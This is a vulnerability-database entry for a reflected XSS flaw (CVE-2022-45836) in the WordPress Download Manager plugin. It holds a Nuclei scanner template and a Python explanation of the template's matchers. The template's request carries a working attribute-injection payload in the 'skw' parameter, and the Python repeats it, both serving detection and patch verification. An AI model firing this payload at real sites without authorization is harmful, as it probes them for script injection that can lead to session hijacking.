WordPress Download Manager <= 3.2.59 - Reflected XSS
CVE-2022-45836
Verified
Description
W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting (XSS) vulnerability caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim's browser. Exploitation requires the attacker to craft a malicious link and have the victim open it.
Severity
High
Published Date
February 6, 2026
Template Author
Shivam Kamboj
CVE-2022-45836.yaml

id: CVE-2022-45836

info:
  name: WordPress Download Manager <= 3.2.59 - Reflected XSS
  author: Shivam Kamboj
  severity: high
  description: |
    W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting (XSS) vulnerability caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim's browser. Exploitation requires the attacker to craft a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45836
    - https://patchstack.com/database/wordpress/plugin/download-manager/vulnerability/wordpress-download-manager-plugin-3-2-59-reflected-cross-site-scripting-xss-vulnerability
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/plugins/download-manager/"
  tags: cve,cve2022,wordpress,wp-plugin,xss,download-manager,wpdm,wp

http:
  - raw:
      - |
        GET /?skw=%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "onfocus=\"alert(document.domain)\" autofocus=\"\"","download-manager")'
        condition: and
# digest: 490a0046304402200e961cbee8f659b436f3492f91ce3d45078b6fb39f16a50a25e6661750f476e402201b61b88e683ec91d18efe40134510a034b3eab964c056e2434393e4f9a792b43:922c64590222798bb761d5b6d8e72950

Remediation Steps
Update to the latest version of the plugin where the vulnerability is fixed.
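To make explicit what the template's two dsl matchers distinguish, here is an added Python example (not part of the template or of the plugin's code) that mirrors the `status_code` and `contains_all` checks against a constructed rendering of the search field. The `render_search_box` markup is a hypothetical stand-in for the plugin's real output; `escape=True` models attribute-context escaping such as WordPress's esc_attr(), which is the class of fix the remediation refers to.

```python
import html
from urllib.parse import unquote

# The skw value from the template's raw request, URL-decoded.
ENCODED_SKW = "%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22"
SKW = unquote(ENCODED_SKW)  # '" onfocus="alert(document.domain)" autofocus="'

# Needles taken verbatim from the template's contains_all(...) matcher.
NEEDLES = ('onfocus="alert(document.domain)" autofocus=""', "download-manager")


def render_search_box(skw: str, escape: bool) -> str:
    """Constructed, hypothetical rendering of a search field that reflects skw.

    escape=False models the unsanitized reflection the page describes (the value
    closes the attribute and injects new ones). escape=True models the fix:
    attribute-context escaping (html.escape here, esc_attr() in WordPress).
    """
    value = html.escape(skw, quote=True) if escape else skw
    return (
        '<div class="download-manager">'
        f'<input type="text" name="skw" value="{value}">'
        "</div>"
    )


def contains_all(body: str, *needles: str) -> bool:
    """Equivalent of the Nuclei DSL contains_all() helper."""
    return all(needle in body for needle in needles)


def template_matches(status_code: int, body: str) -> bool:
    """Both matchers joined with condition: and, as in the template."""
    return status_code == 200 and contains_all(body, *NEEDLES)


if __name__ == "__main__":
    # Unescaped reflection matches; escaped reflection does not.
    print(template_matches(200, render_search_box(SKW, escape=False)))  # True
    print(template_matches(200, render_search_box(SKW, escape=True)))   # False
```

A response that reflects the value through attribute escaping still contains the string "download-manager" but not the injected attributes, so the and-condition fails and the template reports nothing, which is the expected result after updating the plugin.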